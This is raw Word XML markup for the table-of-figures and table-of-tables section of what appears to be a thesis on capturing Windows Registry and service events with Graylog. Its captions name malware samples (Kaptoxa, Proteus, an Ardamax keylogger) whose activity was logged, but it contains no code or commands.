        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.4 Create Input channel for DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303782 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</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83" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.5 Create Output channel for DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303783 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</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84" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.6 Adding 2 Registry Value using Regedit</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303784 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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85" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.7 Graylog capture Event for creating and deleting service</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303785 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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86" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.8 Graylog event information in detail</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303786 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</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87" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.9 Modify registry name for experimenting.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303787 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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88" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.10 Graylog capture events that modify Registry Database</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303788 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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89" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.11 Adding a Registry subkey and modifying subkey name.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303789 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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90" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.12 Graylog capture events that modify Subkey</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303790 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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91" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.13 Creating and deleting a Windows Service</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303791 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</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92" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.14 Graylog capture the events for creating and deleting Windows Services</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303792 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</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93" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.15 Log file of testing events stored in DLCH</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303793 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</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94" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.16 Capture Kaptoxa event</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303794 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</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95" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.17 Capture Proteus event</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303795 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</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96" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.18 Capture Keylogger.Ardamax event</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303796 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>100</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C437AB" w:rsidRPr="00811A53">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc483575481"/>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="00C40A43" w:rsidRDefault="00C44A6F" w:rsidP="00C40A43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="00C44A6F" w:rsidRDefault="00C44A6F" w:rsidP="00C44A6F"/>
    <w:p w:rsidR="00B94D16" w:rsidRDefault="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc485303797" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.1 Registry keys and their correlations.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303797 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</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98" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.2 List of Registry hives and their filenames on system disk.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303798 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</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799" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.3 Registry hive cells and their data types.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303799 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</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800" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.4 Root keys and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303800 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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801" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.5 System Registry value types and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303801 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</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802" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.6 Service Registry values and descriptions</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303802 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</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803" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="006F570A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.7 Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
